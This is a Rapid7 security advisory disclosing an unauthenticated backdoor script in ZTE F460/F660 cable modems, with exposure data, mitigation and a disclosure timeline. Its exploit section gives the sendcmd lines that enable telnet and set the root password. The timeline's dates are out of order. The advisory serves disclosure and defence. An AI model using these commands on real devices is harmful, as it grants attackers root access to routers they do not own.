Disclosure: R7-2013-18, ZTE F460 and ZTE F660 web_shell_cmd.gch Backdoor

Last updated at Fri, 10 May 2019 17:17:23 GMT

Per Rapid7's disclosure policy at http://www.rapid7.com/disclosure.jsp, we are disclosing a discovered vulnerability regarding SOHO routers from hardware manufacturer ZTE. We have had no response from the vendor to our queries for a suitable security contact and PGP key.

One usual aspect of this vulnerability is that it does not appear to be unique in its discovery, given the URLs cited below. As always, our goal with this disclosure is to strengthen the security of the Internet as a whole.

If you know a good security contact at ZTE, please let us know at security@rapid7.com so that we may get confirmation from the vendor the next time we have something security-related to discuss with their products.

Details

Many ZTE F460/F660 cable modems, preferred by ChinaTelecom and other China-based ISPs, ship with an unauthenticated backdoor. The existence of this backdoor is apparently already known in some circles. For example, see the tutorial, here:

http://www.myxzy.com/post-411.html

...which discusses how to remove web_shell_cmd.gch since it allows "any computer on the LAN can use this file to get the superuser password."

Several thousand of these devices are exposed to the Internet, according to a cursory search of the SHODAN Computer Search Engine:

http://www.shodanhq.com/search?q="Mini web server 1.0 ZTE" port:80 after%3 A01-12-2013

Many of these devices also expose the web_shell_cmd.gch script, making it available to unauthenticated users from the WAN side of the cable modem. These cases appear to be a configuration error on the part of either the users or the users' ISPs.

Mitigation

Users can log in to the device and remove the script completely. This may impact functionality expected by the user, however, including the ability of the upstream ISP to perform routine maintence on the device.

Exploit

Exercising the backdoor to open a listening telnet service, and change the root user's password, is trivial, as shown below:

sendcmd 1 DB p TelnetCfg  
sendcmd 1 DB set TelnetCfg 0 TS_UName root  
sendcmd 1 DB set TelnetCfg 0 TS_UPwd password1  
sendcmd 1 DB set TelnetCfg 0 TS_Port "23"  

A Metasploit module exercising the backdoor's functionality will be published as soon as a suitable test device is located for in-house testing, or when a Metasploit module is contributed from the open source security community.

Credit

Rapid7 would like to thank Offensive Security for their assistance with this vulnerability disclosure.

Disclosure Timeline

2013-12-23 (Mon): Vulnerability reported by Unknown

2013-12-23 (Mon): Vulnerability confirmed by Rapid7

2013-12-23 (Mon): Disclosure contact sought at devicesupport@zteusa.com

2013-01-07 (Tue): Disclosed to CERT/CC

2013-03-03 (Mon): Public Disclosure